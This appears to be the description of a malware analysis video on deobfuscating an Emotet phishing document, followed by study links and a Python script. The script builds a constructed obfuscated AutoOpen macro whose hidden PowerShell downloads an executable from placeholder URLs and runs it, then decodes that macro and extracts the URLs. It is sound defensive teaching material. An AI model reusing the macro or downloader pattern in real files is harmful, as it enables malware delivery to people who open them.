Malware Analysis Malicious Document Emotet
Video: http://youtube.com/watch?v=Crc-XDSDJm0
DISCLAIMER: NO SOUND (Intentional)

• Objective: uncover the payload and the URLs it is retrieved from by reverse-engineering the Emotet maldoc. This is the document typically sent in a phishing campaign; when it is opened and macros are enabled, it downloads the first-stage malware through PowerShell.
• First step was understanding the macros, but they were heavily obfuscated, so that was a nightmare (hence the name 'Nightmare_mode.doc').
• We explore the following tools: olevba, oledump.py, and ViperMonkey.
• Eventually we say: screw it, do it old school. Use Linux commands to find the obfuscation pattern and filter it out of the PowerShell command, then do some manual find and replace in a text editor until the desired indicators (the download URLs) come out.

------------------

• A FOLLOW-UP TO A REQUEST
• How to get started? I have validated that you can access these for free. Medium is kind of free, but you are rationed on the number of articles you can read.
• Primer: / malware-analysis-primer
• Setting Up Lab: https://zeltser.com/build-malware-ana...
• Setting Up Lab: https://www.sentinelone.com/labs/buil...
• Setting Up: #1 How to Build a Malware Lab
• Dealing with Malicious Documents: https://blog.redbluepurple.io/other/m...
• Basic Static Analysis: / malware-analysis-techniques-basic-static-a...
• Courses - Misc
• Malware Course: https://github.com/yassirlaaouissi/Ma...
• Reverse Engineering 101: https://malwareunicorn.org/workshops/...
• Guided Hands-on via TryHackMe:
• MAL: Malware Introductory: https://tryhackme.com/room/malmalintr...
• MAL: Researching: https://tryhackme.com/room/malresearc...
• MAL: Strings: https://tryhackme.com/room/malstrings
• Assembly
• Assembly - Pwn Zero To Hero 0x00
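The "old school" route described above, scripted as an added example. This is not code from the video or its author, and it does not touch the real Nightmare_mode.doc: SAMPLE_MACRO, the JUNK token, the example hostnames and every function name here are constructed to mimic the general shape of such macros (a PowerShell command assembled from string literals with a junk token sprinkled in). The steps are the ones the bullets describe: take the macro text dump you would get from olevba or oledump.py, pull the string literals off the assignment lines in order, strip the junk pattern you spotted by eye (the manual find and replace), decode the -EncodedCommand argument (base64 of the UTF-16LE script), and regex the download URLs out of it.

```python
import base64
import re

# ---- constructed sample (NOT the real Nightmare_mode.doc macro) ---------------
# A downloader script of the kind these maldocs launch: several URLs separated by
# '@', tried in order. Hostnames are reserved example domains, not real IOCs.
_SCRIPT = (
    "$u='http://example.invalid/wp-content/a/@http://example.test/cgi-bin/b/'.Split('@');"
    "$p=$env:TEMP+'\\x.exe';"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,$p);"
    "Start-Process $p;break}catch{}}"
)
# powershell -EncodedCommand takes base64 of the UTF-16LE encoded script.
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()

JUNK = "[x]"  # the junk token our constructed macro inserts into every literal


def _obfuscate(s, junk=JUNK, every=7):
    """Insert the junk token every N characters, imitating string obfuscation."""
    return junk.join(s[i:i + every] for i in range(0, len(s), every))


# What the macro might look like after olevba/oledump has dumped it as text.
SAMPLE_MACRO = f'''Sub AutoOpen()
    Dim a, b, c, x
    a = "{_obfuscate('powershell -w hidden -enc ')}"
    b = "{_obfuscate(_ENCODED[:60])}"
    c = "{_obfuscate(_ENCODED[60:])}"
    x = Replace(a & b & c, "{JUNK}", "")
    Shell x, 0
End Sub
'''

# ---- analysis: the "find the pattern and filter it out" steps -------------------
_ASSIGN = re.compile(r'^\s*\w+\s*=\s*(".*)$')   # lines of the form  a = "..." & "..."
_LITERAL = re.compile(r'"([^"]*)"')            # VBA string literals on that line


def recover_command(vba, junk):
    """Concatenate the string literals of all assignment lines in source order,
    then strip the junk token. This is the manual find-and-replace, automated;
    it only works once you have identified the junk pattern by looking at the dump."""
    pieces = []
    for line in vba.splitlines():
        m = _ASSIGN.match(line)
        if m:
            pieces.extend(_LITERAL.findall(m.group(1)))
    return "".join(pieces).replace(junk, "")


# -e, -ec, -enc, -EncodedCommand ... PowerShell accepts any unambiguous prefix.
_ENC_FLAG = re.compile(r'-e\w*\s+([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmd):
    """Return the script hidden behind the encoded-command flag, or None if
    the command line has no such flag."""
    m = _ENC_FLAG.search(cmd)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


_URL = re.compile(r'''https?://[^\s'"@]+''')


def extract_urls(script):
    """Pull http(s) URLs out of the decoded script; '@' is treated as a
    delimiter because the sample joins its URL list with it."""
    return _URL.findall(script)


def indicators(vba, junk=JUNK):
    """End-to-end: macro text dump -> command line -> script -> download URLs."""
    cmd = recover_command(vba, junk)
    script = decode_encoded_command(cmd)
    return {"command": cmd, "script": script, "urls": extract_urls(script or "")}


if __name__ == "__main__":
    for key, value in indicators(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run it against a macro dump instead of the constructed sample by passing the olevba output text and the junk token you found to indicators(). The assignment-line regex and the single-token strip are deliberately narrow: a real sample with Chr() arithmetic, Mid/StrReverse calls or junk that varies per literal needs its own find-and-replace rule, which is exactly where the video falls back to eyeballing the dump.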
